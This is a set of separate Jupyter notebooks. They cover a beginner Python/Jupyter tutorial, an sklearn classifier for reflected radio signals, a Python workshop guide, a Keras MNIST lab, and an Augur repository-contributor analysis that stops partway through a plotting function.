## Jupyter Introduction The Jupyter Notebook is a web application that allows you to create and share documents that contain live code, equations, visualizations and explanatory text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, machine learning and much more. http://jupyter.org You can use arrows to move up or down to cells. You can also use your mouse to select a cell. ``` print "something" # press "alt + enter" to run this cell and generate a new cell print "something once again" # press "shift + enter" to run this cell and move to the next one (ie. without creating a new one) print "and one last time" # press "ctrl + enter" to run this cell without moving to the next cell ``` This is a **markdown**, annotation text. Select this cell and check out the **"Markdown"** label on the tool bar. Notice that when you select other cells they show **"Code"**. ``` %%bash printf "this cell is bash.\nDo you notice the different printf?" # now run this cell %load_ext rpy2.ipython # this allows us to also do R # now run this cell %%R print("This cell is R. Do you notice the '()' ?") # now run this cell ``` Go ahead and run the next cells as well. ``` # let's try something else a=1000 b=2 c=1000/2 print "result=", c s="This is a string" l=["This","is","a","list."] part_of_l=l[0:2] list_of_numbes=[2,3,4,5,6] this_is_a_dictionary={"keyA":"valueA","keyB":"valueB"} getA=this_is_a_dictionary.get("keyA") print "\ns=", s print "\nl=", l print "\npart_of_l, l[0:2]=", part_of_l print "\nAs you can see, python is 0 based:" print "\nlist_of_numbes=", list_of_numbes print "\nlist_of_numbes[0:2]=", list_of_numbes[0:2] print "\nd=", this_is_a_dictionary print "\ngetA=", getA ``` In the next cell try to print a selection of the list "l" so that it looks like this: ```python ["a","list."] ``` ``` # do it here: ``` Now try to get the value of *"keyB"* from the dictionary `this_is_a_dictionary`. ``` # do it here: # what about if staments in python if c >= 500: print "Yes!" else: print "ohoh!" # in python you need to respect tab spacing for statments like "if" # and loops? list_of_names=["Jorge","Bouças"] for name in list_of_names: print "printing", name ``` Lets give it a try at **bash** now. In bash you can list contents of a directory with ```bash ls ``` , make directories with ```bash mkdir ``` and change directories with ```bash cd ``` . ``` %%bash ls %%bash mkdir test_dir %%bash cd test_dir ls ``` Try **Kernel** > **Restart & Clear Output** Now try **Cell** > **Run All**
github_jupyter
``` %matplotlib inline import matplotlib import matplotlib.pyplot as plt plt.rcParams['axes.titlesize'] = 26 plt.rcParams['axes.labelsize']=18 plt.rcParams['xtick.labelsize']=18 plt.rcParams['ytick.labelsize']=18 plt.rcParams['legend.fontsize']=18 plt.rcParams['lines.linewidth'] = 3 plt.rcParams['lines.markersize'] = 10 plt.rcParams['axes.labelsize'] = 22 import numpy as np import pickle from DDAS import MakeReal from AntennaSelection import generateLROASdata, generateOASdata, generateSASdata, calculateBERwithAS from symbols import SymbolGenerator, MLdecoder from channels import KroneckerRayleighChannelMIMO from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from sklearn.model_selection import cross_val_predict, cross_val_score from sklearn.ensemble import RandomForestClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.neural_network import MLPClassifier from sklearn.svm import SVC from sklearn.base import clone import re def removeSpaces(file): r = open(file, 'r') contents = r.read() contents = contents.replace(" ", "") contents = contents.replace("\t","\n") contents = contents.replace('i', 'j') string = file + "_processed.txt" o = open(string, 'w') o.write(contents) #for s in contents: # o.write(s) r.close() o.close() #removeSpaces('./classification_data/test1/test13') def readComplexFile(file): r = open(file, 'r') contents = r.read() contents = contents.split("\n") print(len(contents)) print(contents[:10]) c = np.array(len(contents)) for i in range(len(contents)): try: c[i] = complex(contents[i]) except ValueError: print(contents[i]) return c test1 = np.loadtxt('./classification_data/test1_processed.txt', dtype=complex) test11 = np.loadtxt('./classification_data/test11_processed.txt', dtype=complex) test12 = np.loadtxt('./classification_data/test12_processed.txt', dtype=complex) test13 = np.loadtxt('./classification_data/test13_processed.txt', dtype=complex) test2 = np.loadtxt('./classification_data/test2_processed.txt', dtype=complex) test21 = np.loadtxt('./classification_data/test21_processed.txt', dtype=complex) test22 = np.loadtxt('./classification_data/test22_processed.txt', dtype=complex) test23 = np.loadtxt('./classification_data/test23_processed.txt', dtype=complex) test3 = np.loadtxt('./classification_data/test3_processed.txt', dtype=complex) test31 = np.loadtxt('./classification_data/test31_processed.txt', dtype=complex) test32 = np.loadtxt('./classification_data/test32_processed.txt', dtype=complex) test33 = np.loadtxt('./classification_data/test33_processed.txt', dtype=complex) test4 = np.loadtxt('./classification_data/test4_processed.txt', dtype=complex) test41 = np.loadtxt('./classification_data/test41_processed.txt', dtype=complex) test42 = np.loadtxt('./classification_data/test42_processed.txt', dtype=complex) test5 = np.loadtxt('./classification_data/test5_processed.txt', dtype=complex) test51 = np.loadtxt('./classification_data/test51_processed.txt', dtype=complex) test52 = np.loadtxt('./classification_data/test52_processed.txt', dtype=complex) test6 = np.loadtxt('./classification_data/test6_processed.txt', dtype=complex) test61 = np.loadtxt('./classification_data/test61_processed.txt', dtype=complex) test62 = np.loadtxt('./classification_data/test62_processed.txt', dtype=complex) test7 = np.loadtxt('./classification_data/test7_processed.txt', dtype=complex) test71 = np.loadtxt('./classification_data/test71_processed.txt', dtype=complex) test72 = np.loadtxt('./classification_data/test72_processed.txt', dtype=complex) def breakData(x, n): l = len(x); steps = l//n s = x.shape y = np.zeros((steps,n),dtype = complex) for i in range(steps-1): y[i-(1000//n)] = x[i*n:(i+1)*n] return y def cleanData(x, Nclean, Nleave): while((i+1) < len(x)): x = x[i*Nleave:(i+1)Nleave, (i+1)Nleave + 2*Nclean: ] i += 1 N = 200 plt1 = test1 plt2 = test2 plt3 = test3 plt4 = test4 plt5 = test5 plt6 = test6 plt7 = test7 test1 = breakData(test1, N) test11 = breakData(test11, N) test12 = breakData(test12, N) test13 = breakData(test13, N) test2 = breakData(test2, N) test21 = breakData(test21, N) test22 = breakData(test22, N) test23 = breakData(test23, N) test3 = breakData(test3, N) test31 = breakData(test31, N) test32 = breakData(test32, N) test33 = breakData(test33, N) test4 = breakData(test4, N) test41 = breakData(test41, N) test42 = breakData(test42, N) test5 = breakData(test5, N) test51 = breakData(test51, N) test52 = breakData(test52, N) test6 = breakData(test6, N) test61 = breakData(test61, N) test62 = breakData(test62, N) test7 = breakData(test7, N) test71 = breakData(test71, N) test72 = breakData(test72, N) test72.shape data_prep_pipeline = Pipeline([ ('toReal', MakeReal(RealPart = False, ImaginaryPart=False, magnitude = True, Phase = True)), ('stdScaler', StandardScaler()), ]) x10 = data_prep_pipeline.fit_transform(test1) x11 = data_prep_pipeline.fit_transform(test11) x12 = data_prep_pipeline.fit_transform(test12) x13 = data_prep_pipeline.fit_transform(test13) x20 = data_prep_pipeline.fit_transform(test2) x21 = data_prep_pipeline.fit_transform(test21) x22 = data_prep_pipeline.fit_transform(test22) x23 = data_prep_pipeline.fit_transform(test23) x30 = data_prep_pipeline.fit_transform(test3) x31 = data_prep_pipeline.fit_transform(test31) x32 = data_prep_pipeline.fit_transform(test32) x33 = data_prep_pipeline.fit_transform(test33) x40 = data_prep_pipeline.fit_transform(test4) x41 = data_prep_pipeline.fit_transform(test41) x42 = data_prep_pipeline.fit_transform(test42) x50 = data_prep_pipeline.fit_transform(test5) x51 = data_prep_pipeline.fit_transform(test51) x52 = data_prep_pipeline.fit_transform(test52) x60 = data_prep_pipeline.fit_transform(test6) x61 = data_prep_pipeline.fit_transform(test61) x62 = data_prep_pipeline.fit_transform(test62) x70 = data_prep_pipeline.fit_transform(test7) x71 = data_prep_pipeline.fit_transform(test71) x72 = data_prep_pipeline.fit_transform(test72) del test1 del test11 del test12 del test13 del test2 del test21 del test22 del test23 del test3 del test31 del test32 del test33 del test4 del test41 del test42 del test5 del test51 del test52 del test6 del test61 del test62 del test7 del test71 del test72 x10.shape x10[1].shape s = x10.shape N = s[0] y10 = np.ones(N) y11 = np.ones(N) y12 = np.ones(N) y13 = np.ones(N) y20 = np.ones(N) y21 = np.ones(N) y22 = np.ones(N) y23 = np.ones(N) y30 = np.ones(N) y31 = np.ones(N) y32 = np.ones(N) y33 = np.ones(N) y40 = np.zeros(N) y41 = np.zeros(N) y42 = np.zeros(N) y50 = np.zeros(N) y51 = np.zeros(N) y52 = np.zeros(N) y60 = np.zeros(N) y61 = np.zeros(N) y62 = np.zeros(N) y70 = np.zeros(N) y71 = np.zeros(N) y72 = np.zeros(N) X = np.concatenate((x10,x11,x12,x13,x20,x21,x22,x23,x30,x31,x32,x33,x40,x41,x42,x50,x51,x52,x60,x61,x62,x70,x71,x72)) y = np.concatenate((y10,y11,y12,y13,y20,y21,y22,y23,y30,y31,y32,y33,y40,y41,y42,y50,y51,y52,y60,y61,y62,y70,y71,y72)) p = np.random.permutation(len(X)) X = X[p] y = y[p] N = 5000 Xtest = X[len(X)-N:] Xtrain = X[:len(X)-N] ytest = y[len(y)-N:] ytrain = y[:len(y)-N] del X, y mlpc_clf = MLPClassifier(max_iter=1000) mlpc_clf.fit(Xtrain,ytrain) print(mlpc_clf.score(Xtest,ytest)) svc_clf = SVC() knn_clf = KNeighborsClassifier(n_neighbors=51) knn_clf.fit(Xtrain[:10000],ytrain[:10000]) knn_clf.score(Xtest,ytest) svc_clf.fit(Xtrain[:10000], ytrain[:10000]) svc_clf.score(Xtest,ytest) start = 17000 N = 100 plt.figure(figsize=(20,15)) plt.subplot(2,1,1) plt.plot(np.abs(plt1[start:start+N])) plt.subplot(2,1,2) plt.plot(np.angle(plt1[start:start+N])) plt.show() plt.figure(figsize=(20,15)) plt.subplot(2,1,1) plt.plot(np.abs(plt2[start:start+N])) plt.subplot(2,1,2) plt.plot(np.angle(plt2[start:start+N])) plt.show() plt.figure(figsize=(20,15)) plt.subplot(2,1,1) plt.plot(np.abs(plt3[start:start+N])) plt.subplot(2,1,2) plt.plot(np.angle(plt3[start:start+N])) plt.show() plt.figure(figsize=(15,10)) plt.plot(np.abs(plt1[start:start+N]), label='Plastic Glass') plt.plot(np.abs(plt2[start:start+N]), label='Metallic Glass') plt.plot(np.abs(plt3[start:start+N]), label ='Glass') plt.plot(np.abs(plt4[start:start+N]),'--', label='Mirror') plt.plot(np.abs(plt5[start:start+N]),'--', label='Plastic Disc') plt.plot(np.abs(plt6[start:start+N]),'--', label = 'Book') plt.plot(np.abs(plt7[start:start+N]),'--', label ='Metal Disc') plt.legend() plt.ylabel('Magnitude') plt.xlabel('Time Samples') plt.show() plt.figure(figsize=(20,15)) plt.plot(np.angle(plt1[start:start+N]), label='Plastic Glass') plt.plot(np.angle(plt2[start:start+N]), label='Metallic Glass') plt.plot(np.angle(plt3[start:start+N]), label ='Glass') plt.plot(np.angle(plt4[start:start+N]),'--', label='Mirror') plt.plot(np.angle(plt5[start:start+N]),'--', label='Plastic Disc') plt.plot(np.angle(plt6[start:start+N]),'--', label = 'Wood') plt.plot(np.angle(plt7[start:start+N]),'--', label ='Metal Disc') plt.legend() plt.ylabel('Magnitude') plt.xlabel('Time Samples') plt.show() plt.figure(figsize=(20,15)) plt.plot(np.abs(plt1[12000:24000])) plt.show() plt.figure(figsize=(20,15)) plt.plot(np.abs(plt2[12000:24000])) plt.show() plt.figure(figsize=(20,15)) plt.plot(np.abs(plt3[12000:24000])) plt.show() ```
github_jupyter
# Introduction to Python The are several ways to run a python script. That is true for other programming languages as well. One way is to use the Python interpreter. # Using the Python interpreter In the command line type: ```shell $ python ``` This will start a prompt that looks something like: ![](static/python_interpreter.png) The `>>>` indicates point at which you can type python code. Type `2 + 2` and press enter. You can see what this looks like below: ```python >>> 2 + 2 4 ``` # Creating numeric variables We can assign variables to values using the `=` operator: ```python >>> the_meaning_of_life = 42 >>> the_meaning_of_life = the_meaning_of_life + 2 >>> the_meaning_of_life 44 ``` # Creating boolean variables We can create boolean values using a number of comparison operators which include: - `==` equals - `!=` not equals - `>` strictly greater - `>=` greater than or equal ```python >>> is_42 = the_meaning_of_life == 42 >>> is_42 False >>> greater_than_42 = the_meaning_of_life > 42 >>> greater_than_42 True ``` # Creating list variables Python has an indexable structure called lists: ```python >>> numbers = [1, 2, 4, 5] >>> max(numbers) 5 >>> min(numbers) 1 >>> sum(numbers) 12 >>> numbers[0] 1 >>> numbers[-2] 4 >>> numbers.append(50) >>> numbers [1, 2, 4, 5, 50] ``` To close the python interpreter type: ```shell $ exit() ``` # Using Python scripts Another way to run Python is using a script and the command line. Python scripts are used when writing more sophisticated code (software). Open the `addition.py` file (we created before) using the editor you downloaded (for example VS code) for this workshop. Edit the `addition.py` so that it looks like this: ```python print(1 + 1) ``` and save. While making sure you are in the `rsd-workshop`, which you can check using the command: ```shell $ cd ``` or ```shell $ pwd ``` use the following command to run the python script `addition.py`: ```shell $ python addition.py ``` # If statements Let's create another Python file called `if-statements.py`. This can be done either by using the `echo`/`touch` command or from your editor `File > New file`. Include the following code in the file: ```python N = 572 if N % 2 == 0: print("N is even") else: print("N is odd") ``` and then run it (type): ```shell $ python if-statements.py ``` **Note** white space and indentation is important in python. The indented code block indicate what code to execute if the boolean variable `N % 2 == 0` is True. # While loops It is possible to repeat code using while loops which will repeatedly check a boolean variable. Create a file called `while-loops.py`, include the following code and run it. ```python N = 0 even_number_count = 0 while N < 10: if N % 2 == 0: even_number_count = even_number_count + 1 N += 1 print(even_number_count) ``` # Functions It is possible to create functions in Python. Open the file `addition.py` and we are going to implement a function which adds two input numbers. Your `addition.py` should look like: ```python def add_two_numbers(a, b): return a + b print(add_two_numbers(1, 3)) ``` save and run: ```shell $ python addition.py ```
github_jupyter
# Classification using the Keras Sequential API **Learning Objectives** 1. Build a neural network that classifies images. 2. Train this neural network. 3. Evaluate the accuracy of the model. ## Introduction This short introduction uses [Keras](https://keras.io/), a high-level API to build and train models in TensoFlow. In this lab, you Load and prepare the MNIST dataset, convert the samples from integers to floating-point numbers, build and train a neural network that classifies images and then evaluate the accuracy of the model. Each learning objective will correspond to a __#TODO__ in the [student lab notebook](https://github.com/GoogleCloudPlatform/training-data-analyst/blob/master/courses/machine_learning/deepdive2/introduction_to_tensorflow/solutions/intro_logistic_regression_TF2.0.ipynb) -- try to complete that notebook first before reviewing this solution notebook. ## Load necessary libraries We will start by importing the necessary libraries for this lab. ``` import tensorflow as tf print("TensorFlow version: ",tf.version.VERSION) ``` Load and prepare the [MNIST dataset](http://yann.lecun.com/exdb/mnist/). Convert the samples from integers to floating-point numbers: ``` mnist = tf.keras.datasets.mnist (x_train, y_train), (x_test, y_test) = mnist.load_data() x_train, x_test = x_train / 255.0, x_test / 255.0 ``` Build the `tf.keras.Sequential` model by stacking layers. Choose an optimizer and loss function for training: ``` # TODO 1 model = tf.keras.models.Sequential([ tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dropout(0.2), tf.keras.layers.Dense(10) ]) ``` For each example the model returns a vector of "[logits](https://developers.google.com/machine-learning/glossary#logits)" or "[log-odds](https://developers.google.com/machine-learning/glossary#log-odds)" scores, one for each class. ``` predictions = model(x_train[:1]).numpy() predictions ``` The `tf.nn.softmax` function converts these logits to "probabilities" for each class: ``` tf.nn.softmax(predictions).numpy() ``` Note: It is possible to bake this `tf.nn.softmax` in as the activation function for the last layer of the network. While this can make the model output more directly interpretable, this approach is discouraged as it's impossible to provide an exact and numerically stable loss calculation for all models when using a softmax output. The `losses.SparseCategoricalCrossentropy` loss takes a vector of logits and a `True` index and returns a scalar loss for each example. ``` loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) # TODO 2 ``` This loss is equal to the negative log probability of the true class: It is zero if the model is sure of the correct class. This untrained model gives probabilities close to random (1/10 for each class), so the initial loss should be close to `-tf.log(1/10) ~= 2.3`. ``` loss_fn(y_train[:1], predictions).numpy() model.compile(optimizer='adam', loss=loss_fn, metrics=['accuracy']) ``` The `Model.fit` method adjusts the model parameters to minimize the loss: ``` model.fit(x_train, y_train, epochs=5) ``` The `Model.evaluate` method checks the models performance, usually on a "[Validation-set](https://developers.google.com/machine-learning/glossary#validation-set)" or "[Test-set](https://developers.google.com/machine-learning/glossary#test-set)". ``` model.evaluate(x_test, y_test, verbose=2) ``` The image classifier is now trained to ~98% accuracy on this dataset. To learn more, read the [TensorFlow tutorials](https://www.tensorflow.org/tutorials/). If you want your model to return a probability, you can wrap the trained model, and attach the softmax to it: ``` probability_model = tf.keras.Sequential([ model, tf.keras.layers.Softmax() ]) probability_model(x_test[:5]) ```
github_jupyter
# New Contributor Analysis ``` import psycopg2 import pandas as pd import sqlalchemy as salc import numpy as np import seaborn as sns import matplotlib.pyplot as plt import warnings import datetime import json warnings.filterwarnings('ignore') with open("config.json") as config_file: config = json.load(config_file) database_connection_string = 'postgres+psycopg2://{}:{}@{}:{}/{}'.format(config['user'], config['password'], config['host'], config['port'], config['database']) dbschema='augur_data' engine = salc.create_engine( database_connection_string, connect_args={'options': '-csearch_path={}'.format(dbschema)}) ``` ## Repo Filter ``` #declare all repo ids you would like to produce charts for repo_set = {25440, 25448} #can be set as 'competitors' or 'repo' #'competitors' will group graphs by type, so it is easy to compare across repos # 'repo' will group graphs by repo so it is easy to look at all the contributor data for each repo display_grouping = 'repo' #if display_grouping is set to 'competitors', enter the repo ids you do no want to alias, if 'display_grouping' is set to repo the list will not effect anything not_aliased_repos = [25440, 25448] #group_by can be set as 'month' or 'year' group_by = 'month' #requirements for a contributor to be considered a repeat contributor time = 365 num_contributions_required = 5 #specify dates for filtering #if the end_date is in the future, the end_date will default to the current_date begin_date = '2019-10-01' end_date = '2020-10-31' save_files = False #create tuple that contains all the contributor rankings needed rank_list = [] for num in range(1, num_contributions_required + 1): rank_list.append(num) rank_tuple = tuple(rank_list) ``` ## Query Contributor and Month Data ``` df = pd.DataFrame() for repo_id in repo_set: pr_query = salc.sql.text(f""" SELECT * FROM ( SELECT ID AS cntrb_id, A.created_at AS created_at, date_part('month', A.created_at::DATE) AS month, date_part('year', A.created_at::DATE) AS year, A.repo_id, repo_name, full_name, login, ACTION, rank() OVER ( PARTITION BY id ORDER BY A.created_at ASC ) FROM ( ( SELECT canonical_id AS ID, created_at AS created_at, repo_id, 'issue_opened' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.issues LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = issues.reporter_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE repo_id = {repo_id} AND pull_request IS NULL GROUP BY canonical_id, repo_id, issues.created_at, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT canonical_id AS ID, TO_TIMESTAMP( cmt_author_date, 'YYYY-MM-DD' ) AS created_at, repo_id, 'commit' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.commits LEFT OUTER JOIN augur_data.contributors ON cntrb_email = cmt_author_email LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE repo_id = {repo_id} GROUP BY repo_id, canonical_email, canonical_id, commits.cmt_author_date, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT message.cntrb_id AS ID, created_at AS created_at, commits.repo_id, 'commit_comment' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.commit_comment_ref, augur_data.commits, augur_data.message LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = message.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE commits.cmt_id = commit_comment_ref.cmt_id AND commits.repo_id = {repo_id} AND commit_comment_ref.msg_id = message.msg_id GROUP BY ID, commits.repo_id, commit_comment_ref.created_at, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT issue_events.cntrb_id AS ID, issue_events.created_at AS created_at, repo_id, 'issue_closed' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.issues, augur_data.issue_events LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = issue_events.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE issues.repo_id = {repo_id} AND issues.issue_id = issue_events.issue_id AND issues.pull_request IS NULL AND issue_events.cntrb_id IS NOT NULL AND ACTION = 'closed' GROUP BY issue_events.cntrb_id, repo_id, issue_events.created_at, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT pr_augur_contributor_id AS ID, pr_created_at AS created_at, repo_id, 'open_pull_request' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.pull_requests LEFT OUTER JOIN augur_data.contributors ON pull_requests.pr_augur_contributor_id = contributors.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE pull_requests.repo_id = {repo_id} GROUP BY pull_requests.pr_augur_contributor_id, pull_requests.repo_id, pull_requests.pr_created_at, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT message.cntrb_id AS ID, msg_timestamp AS created_at, repo_id, 'pull_request_comment' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.pull_requests, augur_data.pull_request_message_ref, augur_data.message LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = message.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE pull_requests.repo_id = {repo_id} AND pull_request_message_ref.pull_request_id = pull_requests.pull_request_id AND pull_request_message_ref.msg_id = message.msg_id GROUP BY message.cntrb_id, pull_requests.repo_id, message.msg_timestamp, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT issues.reporter_id AS ID, msg_timestamp AS created_at, repo_id, 'issue_comment' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM issues, issue_message_ref, message LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = message.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE issues.repo_id = {repo_id} AND issue_message_ref.msg_id = message.msg_id AND issues.issue_id = issue_message_ref.issue_id AND issues.pull_request_id = NULL GROUP BY issues.reporter_id, issues.repo_id, message.msg_timestamp, contributors.cntrb_full_name, contributors.cntrb_login ) ) A, repo WHERE ID IS NOT NULL AND A.repo_id = repo.repo_id GROUP BY A.ID, A.repo_id, A.ACTION, A.created_at, repo.repo_name, A.full_name, A.login ORDER BY cntrb_id ) b WHERE RANK IN {rank_tuple} """) df_first_repo = pd.read_sql(pr_query, con=engine) if not df.empty: df = pd.concat([df, df_first_repo]) else: # first repo df = df_first_repo #end_date = pd.to_datetime(end_date) #current_time = datetime.datetime.now() #if end_date > current_time: # end_date = current_time months_df = pd.DataFrame() #months_query makes a df of years and months, this is used to fill the months with no data in the visualizaitons months_query = salc.sql.text(f""" SELECT * FROM ( SELECT date_part( 'year', created_month :: DATE ) AS year, date_part( 'month', created_month :: DATE ) AS MONTH FROM (SELECT * FROM ( SELECT created_month :: DATE FROM generate_series (TIMESTAMP '{begin_date}', TIMESTAMP '{end_date}', INTERVAL '1 month' ) created_month ) d ) x ) y """) months_df = pd.read_sql(months_query, con=engine) display(months_df) display(df) ``` ## Remove Bots and Only Keep Actions in Actions List ``` df = df.loc[~df['full_name'].str.contains('bot', na=False)] df = df.loc[~df['login'].str.contains('bot', na=False)] ``` ## Add Date Data ``` #add yearmonths to contributor df[['month', 'year']] = df[['month', 'year']].astype(int).astype(str) df['yearmonth'] = df['month'] + '/' + df['year'] df['yearmonth'] = pd.to_datetime(df['yearmonth']) #add yearmonths to months_df months_df[['year','month']] = months_df[['year','month']].astype(float).astype(int).astype(str) months_df['yearmonth'] = months_df['month'] + '/' + months_df['year'] months_df['yearmonth'] = pd.to_datetime(months_df['yearmonth']) #filter months_df with begin_date and end_date, the contributor df is filtered in the visualizations months_df = months_df.set_index(months_df['yearmonth']) months_df = months_df.loc[begin_date : end_date].reset_index(drop = True) # add column with every value being one, so when the contributor df is concatenated with the months df, the filler months won't be counted in the sums df['new_contributors'] = 1 #return the quarter in yearmonth form, when given a month and year def quarters(month, year): if month >= 1 and month <=3: return '01' + '/' + year elif month >=4 and month <=6: return '04' + '/' + year elif month >= 5 and month <=9: return '07' + '/' + year elif month >= 10 and month <= 12: return '10' + '/' + year #add quarters to contributor dataframe df['month'] = df['month'].astype(int) df['quarter'] = df.apply(lambda x: quarters(x['month'], x['year']), axis=1) df['quarter'] = pd.to_datetime(df['quarter']) #add quarters to months dataframe months_df['month'] = months_df['month'].astype(int) months_df['quarter'] = months_df.apply(lambda x: quarters(x['month'], x['year']), axis=1) months_df['quarter'] = pd.to_datetime(months_df['quarter']) ``` ## Repo Aliasing ``` #create a dictionairy with a number(0-26) as the key and a letter(A-Z) as the value #this is used to alias repos when using 'competor' display grouping is specified letters = [] nums = [] alpha = 'a' for i in range(0, 26): letters.append(alpha) alpha = chr(ord(alpha) + 1) nums.append(i) letters = [x.upper() for x in letters] #create dict out of list of numbers and letters repo_alias_dict = {nums[i]: letters[i] for i in range(len(nums))} # create dict in the form {repo_id : repo_name} aliased_repos = [] repo_dict = {} count = 0 for repo_id in repo_set: #find corresponding repo name from each repo_id repo_name = df.loc[df['repo_id'] == repo_id].iloc[0]['repo_name'] #if competitor grouping is enabled turn all repo names, other than the ones in the 'not_aliased_repos' into an alias if display_grouping == 'competitors' and not repo_id in not_aliased_repos: repo_name = 'Repo ' + repo_alias_dict[count] #add repo_id to list of aliased repos, this is used for ordering aliased_repos.append(repo_id) count += 1 #add repo_id and repo names as key value pairs into a dict, this is used to label the title of the visualizations repo_dict.update({repo_id : repo_name}) #gurantees that the non_aliased repos come first when display grouping is set as 'competitors' repo_list = not_aliased_repos + aliased_repos #gurantee that the 'repo_list' only includes repos from the main 'repo_set' for repo_id in repo_list: if repo_id not in repo_set: repo_list.remove(repo_id) display(repo_dict) ``` # Start Visualization Methods ``` #import visualization libraries from bokeh.io import output_notebook, show, export_png from bokeh.plotting import figure from bokeh.models import Label, LabelSet, ColumnDataSource, Legend from bokeh.palettes import Colorblind from bokeh.layouts import gridplot from bokeh.transform import cumsum from math import pi ``` ### New Contributors Bar Chart ``` def vertical_bar_chart(input_df, months_df, repo_id, group_by, y_axis='new_contributors', title = "{}: {} {} Time Contributors Per {}", required_contributions = 4, required_time = 5): contributor_types = ['All', 'repeat', 'drive_by'] ranks = [1,2] #determine if a list or integer is the input, and create a list if type(repo_id) == type(repo_list): repo_ids = repo_id else: repo_ids = [repo_id] for rank in ranks: for contributor_type in contributor_types: #do not display these visualizations since drive-by's do not have second contributions, and the second contribution of a repeat contributor is the same thing as the all the second time contributors if (rank == 2 and contributor_type == 'drive_by') or (rank == 2 and contributor_type == 'repeat'): continue #do not display these visualizations since drive-by's do not have second contributions, and the second contribution of a repeat contributor is the same thing as the all the second time contributors for repo_id in repo_ids: output_notebook() #create a copy of contributor dataframe driver_df = input_df.copy() #filter dataframe by repo_id driver_df = driver_df.loc[driver_df['repo_id'] == repo_id] #remove first time contributors before begin date, along with their second contribution mask = (driver_df['yearmonth'] < begin_date) driver_df= driver_df[~driver_df['cntrb_id'].isin(driver_df.loc[mask]['cntrb_id'])] #create separate repeat_df that includes all repeat contributors #then any contributor that is not in the repeat_df is a drive-by contributor repeats_df = driver_df.copy() #discards rows other than the first and the row required to be a repeat contributor repeats_df = repeats_df.loc[repeats_df['rank'].isin([1,required_contributions])] #removes all the contributors that only have a first contirbution repeats_df = repeats_df[repeats_df['cntrb_id'].isin(repeats_df.loc[driver_df['rank'] == required_contributions]['cntrb_id'])] #create lists of 'created_at' times for the final required contribution and the first contribution repeat_list = repeats_df.loc[driver_df['rank'] == required_contributions]['created_at'].tolist() first_list = repeats_df.loc[driver_df['rank'] == 1]['created_at'].tolist() #only keep first time contributions, since those are the dates needed for visualization repeats_df = repeats_df.loc[driver_df['rank'] == 1] #create list of time differences between the final required contribution and the first contribution, and add it to the df differences = [] for i in range(0, len(repeat_list)): time_difference = repeat_list[i] - first_list[i] total = time_difference.days * 86400 + time_difference.seconds differences.append(total) repeats_df['differences'] = differences #remove contributions who made enough contributions, but not in a short enough time repeats_df = repeats_df.loc[repeats_df['differences'] <= required_time * 86400] if contributor_type == 'repeat': driver_df = repeats_df caption = """This graph shows repeat contributors in the specified time period. Repeat contributors are contributors who have made 